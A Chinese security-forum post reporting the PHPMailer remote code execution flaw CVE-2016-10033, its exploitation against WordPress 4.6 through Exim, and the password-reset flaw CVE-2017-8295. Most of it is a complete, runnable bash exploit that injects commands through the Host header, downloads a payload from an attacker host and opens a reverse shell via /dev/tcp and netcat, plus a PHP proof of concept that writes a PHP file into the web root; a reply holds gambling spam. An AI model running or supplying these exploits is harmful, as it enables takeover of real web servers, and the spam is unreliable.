QQ登录

只需一步,快速开始

微信登录

扫一扫,访问微社区

聚优论坛

查看: 6077|回复: 1

PHPMailer曝远程代码执行高危漏洞(CVE-2016-10033)

  [复制链接]
卖炭翁 发表于 2017-5-5 19:50:22 | 显示全部楼层 |阅读模式

注册会员,学习更多最新技术!

您需要 登录 才可以下载或查看,没有帐号?点击注册

x
【2017.5.4更新】

昨天曝出了两个比较热门的漏洞,一个是CVE-2016-10033,另一个则为CVE-2017-8295。从描述来看,前者是WordPress Core 4.6一个未经授权的RCE漏洞。不过实际上,这就是去年12月份FreeBuf已经报道的漏洞,因此我们在原文基础上进行更新。

这次漏洞公告就是PHPMailer漏洞利用细节在WordPress核心中的实现。未经授权的攻击者利用漏洞就能实现远程代码执行,针对目标服务器实现即时访问,最终导致目标应用服务器的完全陷落。无需插件或者非标准设置,就能利用该漏洞。实际上Wordfence当时就曾经提到过该漏洞影响到了WP Core。

最新的这则公告提到了PHP mail()函数的新利用向量,可在MTA – Exim4之上利用该漏洞,Exim在如Debian或Ubuntu等系统中都是默认安装的。这样一来也就增加了此类攻击的范围和漏洞的严重性。具体为利用host字段注入了恶意数据,进入到了mail函数,再利用sendmail (实际上是软连接到的exim4)命令的-be 参数来执行命令。

之所以到现在才公布这部分细节,是期望给予WordPress和其它收到影响的软件提供商更多时间来升级受影响的Mail库。除此之外,也是针对CVE-2017-8295漏洞留出更多的修复时间。


影响范围:

本次公告中提到的RCE PoC基于WordPress 4.6实现,不过其它版本的WordPress也可能受到影响。


作者给出的PoC:
  1. #!/bin/bash

  2. #

  3. # __ __ __ __ __

  4. # / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________

  5. # / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/

  6. # / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )

  7. # /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/

  8. # /____/

  9. #

  10. #

  11. # WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit

  12. # CVE-2016-10033

  13. #

  14. # wordpress-rce-exploit.sh (ver. 1.0)

  15. #

  16. #

  17. # Discovered and coded by

  18. #

  19. # Dawid Golunski (@dawid_golunski)

  20. # https://legalhackers.com

  21. #

  22. # ExploitBox project:

  23. # https://ExploitBox.io

  24. #

  25. # Full advisory URL:

  26. # https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html

  27. #

  28. # Exploit src URL:

  29. # https://exploitbox.io/exploit/wordpress-rce-exploit.sh

  30. #

  31. #

  32. # Tested on WordPress 4.6:

  33. # https://github.com/WordPress/WordPress/archive/4.6.zip

  34. #

  35. # Usage:

  36. # ./wordpress-rce-exploit.sh target-wordpress-url

  37. #

  38. #

  39. # Disclaimer:

  40. # For testing purposes only

  41. #

  42. #

  43. # -----------------------------------------------------------------

  44. #

  45. # Interested in vulns/exploitation?

  46. #

  47. #

  48. # .;lc'

  49. # .,cdkkOOOko;.

  50. # .,lxxkkkkOOOO000Ol'

  51. # .':oxxxxxkkkkOOOO0000KK0x:'

  52. # .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.

  53. # ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.

  54. # '';ldxxxxxdc,. ,oOXXXNNNXd;,.

  55. # .ddc;,,:c;. ,c: .cxxc:;:ox:

  56. # .dxxxxo, ., ,kMMM0:. ., .lxxxxx:

  57. # .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:

  58. # .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:

  59. # .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:

  60. # .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:

  61. # .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:

  62. # .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:

  63. # .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:

  64. # .dxxxxxdl;. ., .. .;cdxxxxxx:

  65. # .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:

  66. # .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.

  67. # .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.

  68. # .':oxxxxxxxxx.ckkkkkkkkxl,.

  69. # .,cdxxxxx.ckkkkkxc.

  70. # .':odx.ckxl,.

  71. # .,.'.

  72. #

  73. # https://ExploitBox.io

  74. #

  75. # https://twitter.com/Exploit_Box

  76. #

  77. # -----------------------------------------------------------------

  78. rev_host="192.168.57.1"

  79. function prep_host_header() {

  80. cmd="$1"

  81. rce_cmd="\${run{$cmd}}";

  82. # replace / with ${substr{0}{1}{$spool_directory}}

  83. #sed 's^/^${substr{0}{1}{$spool_directory}}^g'

  84. rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"

  85. # replace ' ' (space) with

  86. #sed 's^ ^${substr{10}{1}{$tod_log}}$^g'

  87. rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"

  88. #return "target(any -froot@localhost -be $rce_cmd null)"

  89. host_header="target(any -froot@localhost -be $rce_cmd null)"

  90. return 0

  91. }

  92. #cat exploitbox.ans

  93. intro="

  94. DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r

  95. bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f

  96. G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c

  97. G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg

  98. IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f

  99. IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f

  100. X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6

  101. b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb

  102. NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N

  103. TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1

  104. QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz

  105. NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g

  106. G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54

  107. eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb

  108. WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO

  109. TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg

  110. ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb

  111. MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD

  112. G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob

  113. WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz

  114. NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb

  115. MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f

  116. X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4

  117. bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"

  118. intro2="

  119. ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09

  120. fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb

  121. MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg

  122. ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE

  123. aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09

  124. fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg

  125. ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh

  126. bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt

  127. ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt

  128. ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp

  129. bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1

  130. cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="

  131. echo "$intro" | base64 -d

  132. echo "$intro2" | base64 -d

  133. if [ "$#" -ne 1 ]; then

  134. echo -e "Usage:\n$0 target-wordpress-url\n"

  135. exit 1

  136. fi

  137. target="$1"

  138. echo -ne "\e[91m[*]\033[0m"

  139. read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice

  140. echo

  141. if [ "$choice" == "y" ]; then

  142. echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"

  143. echo -e "\e[92m[+]\033[0m Connected to the target"

  144. # Serve payload/bash script on :80

  145. RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"

  146. echo "$RCE_exec_cmd" > rce.txt

  147. python -mSimpleHTTPServer 80 2>/dev/null >&2 &

  148. hpid=$!

  149. # Save payload on the target in /tmp/rce

  150. cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"

  151. prep_host_header "$cmd"

  152. curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword

  153. echo -e "\n\e[92m[+]\e[0m Payload sent successfully"

  154. # Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce

  155. cmd="/bin/bash /tmp/rce"

  156. prep_host_header "$cmd"

  157. curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &

  158. echo -e "\n\e[92m[+]\033[0m Payload executed!"

  159. echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"

  160. nc -vv -l 1337

  161. echo

  162. else

  163. echo -e "\e[92m[+]\033[0m Responsible choice ;)  Exiting.\n"

  164. exit 0

  165. fi

  166. echo "Exiting..."

  167. exit 0
复制代码

上述另外一个最新曝出编号为CVE-2017-8295的漏洞,严重程度被评级为介于Medium和High之间(而非Critical),影响到WordPress Core <= 4.7.4以下的版本。

这个漏洞的概况是这样的:WordPress有个密码重置功能,该特性中存在漏洞——在某些情况下可能导致攻击者在无需身份认证的情况下拿到密码重置链接,这样一来攻击者就能获取目标用户的WordPress账户了。

这个漏洞源于WordPress默认在创建密码重置邮件的时候,采用不受信任的数据。具体的利用方式点击这里查看。目前WordPress官方暂无针对该问题的解决方案,可以采用如下临时解决方案:

用户可启用UserCanonicalName实施静态SERVER_NAME值

https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname

据作者所说,该问题已经向WordPress安全团队进行过多次反馈,最早一次是在去年7月份,但一直没有得到相应的反馈。

【2016.12.27原文】

这次曝出远程代码执行漏洞的是堪称全球最流行邮件发送类的PHPMailer,据说其全球范围内的用户量大约有900万——每天还在持续增多。

GitHub上面形容PHPMailer“可能是全球PHP发送邮件最流行的代码。亦被诸多开源项目所采用,包括WordPress、Drupal、1CRM、Joomla!等”。所以这个漏洞影响范围还是比较广的,漏洞级别也为Critical最高级。

漏洞编码

CVE-2016-10033

影响版本

PHPMailer <  5.2.18

漏洞级别

高危

漏洞描述

独立研究人员Dawid Golunski发现了该漏洞——远程攻击者利用该漏洞,可实现远程任意代码在web服务器账户环境中执行,并使web应用陷入威胁中。攻击者主要在常见的web表单如意见反馈表单,注册表单,邮件密码重置表单等使用邮件发送的组件时利用此漏洞。

不过有关该漏洞的细节信息,研究人员并未披露,期望给予网站管理员更多的时间来升级PHPMailer类,避免受漏洞影响。   

漏洞PoC

实际上Dawid Golunski已经做了个可行的RCE PoC,不过会迟一些再发布。关注视频PoC请点击:https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

更新:PoC代码已经公布,请站长们尽快升级!

  1. <?php
  2. /*
  3. PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
  4. A simple PoC (working on Sendmail MTA)
  5. It will inject the following parameters to sendmail command:
  6. Arg no. 0 == [/usr/sbin/sendmail]
  7. Arg no. 1 == [-t]
  8. Arg no. 2 == [-i]
  9. Arg no. 3 == [-fattacker\]
  10. Arg no. 4 == [-oQ/tmp/]
  11. Arg no. 5 == [-X/var/www/cache/phpcode.php]
  12. Arg no. 6 == [some"@email.com]
  13. which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
  14. The resulting file will contain the payload passed in the body of the msg:
  15. 09607 <<< --b1_cb4566aa51be9f090d9419163e492306
  16. 09607 <<< Content-Type: text/html; charset=us-ascii
  17. 09607 <<<
  18. 09607 <<< <?php phpinfo(); ?>
  19. 09607 <<<
  20. 09607 <<<
  21. 09607 <<<
  22. 09607 <<< --b1_cb4566aa51be9f090d9419163e492306--
  23. See the full advisory URL for details.
  24. */
  25. // Attacker's input coming from untrusted source such as $_GET , $_POST etc.
  26. // For example from a Contact form
  27. $email_from = '"attacker" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com';
  28. $msg_body  = "<?php phpinfo(); ?>";
  29. // ------------------
  30. // mail() param injection via the vulnerability in PHPMailer
  31. require_once('class.phpmailer.php');
  32. $mail = new PHPMailer(); // defaults to using php "mail()"
  33. $mail->SetFrom($email_from, 'Client Name');
  34. $address = "customer_feedback@company-X.com";
  35. $mail->AddAddress($address, "Some User");
  36. $mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033";
  37. $mail->MsgHTML($msg_body);
  38. if(!$mail->Send()) {
  39. echo "Mailer Error: " . $mail->ErrorInfo;
  40. } else {
  41. echo "Message sent!\n";
  42. }
复制代码

漏洞修复

更新到5.2.18:https://github.com/PHPMailer/PHPMailer

漏洞详情目前已经提交给了PHPMailer官方——官方也已经发布了PHPMailer 5.2.18紧急安全修复,解决上述问题,受影响的用户应当立即升级。详情可参见:

https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md

https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md


回复

使用道具 举报

dfwkh 发表于 2018-12-5 14:53:16 | 显示全部楼层
如果嫌去澳门太麻烦的话,在家就能开户玩。名爵国际 娱 乐 城 斥资1500亿打造网上最佳投资平台,持菲律宾正规 博 彩 执照,单个用户日最高可提款5000万,3-5分钟即可到账。官方网址:900868.com
回复 支持 反对

使用道具 举报

*滑动验证:
您需要登录后才可以回帖 登录 | 点击注册

本版积分规则

手机版|小黑屋|Archiver| 聚优论坛 ( 鄂ICP备16013399号-1 )

GMT+8, 2019-8-26 11:28 , Processed in 0.060398 second(s), 30 queries , Gzip On.

Powered by 聚优论坛

© 2010-2019

快速回复 返回顶部 返回列表